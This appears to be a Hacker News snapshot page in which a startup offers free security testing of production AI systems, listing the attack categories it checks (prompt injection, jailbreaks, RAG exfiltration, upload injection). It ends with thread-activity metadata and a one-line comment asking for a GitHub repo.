Free AI Security Testing
Key topics
We focus on the stuff that actually breaks AI systems in production:
Prompt injection attacks (direct/indirect) and jailbreaks
Tool abuse and RAG data exfiltration
Identity manipulation and role-playing exploits
CSV/HTML injection through document uploads
Voice system manipulation and audio-based attacks
You'd get a full report with concrete reproduction steps, specific mitigations, and we'll do a retest after you implement fixes. We can also map findings to compliance frameworks (OWASP Top 10 for LLMs, NIST AI RMF, EU AI Act, etc.) if that's useful. All we need is access to an endpoint and permission to use your anonymized results as a case study. The whole process takes about 2-3 weeks. If you're running AI/LLM systems in production and want a security review, shoot me a DM.
A startup is offering free AI security testing to 5-10 companies in exchange for feedback and case studies.
Snapshot generated from the HN discussion
Discussion Activity
Light discussionFirst comment
19m
Peak period
1
0-1h
Avg / period
1
Key moments
- 01Story posted
Aug 24, 2025 at 11:31 PM EDT
4 months ago
Step 01 - 02First comment
Aug 24, 2025 at 11:50 PM EDT
19m after posting
Step 02 - 03Peak activity
1 comments in 0-1h
Hottest window of the conversation
Step 03 - 04Latest activity
Aug 24, 2025 at 11:50 PM EDT
4 months ago
Step 04
Generating AI Summary...
Analyzing up to 500 comments to identify key contributors and discussion patterns
Want the full context?
Jump to the original sources
Read the primary article or dive into the live Hacker News thread when you're ready.
a github repo at least on what you did so far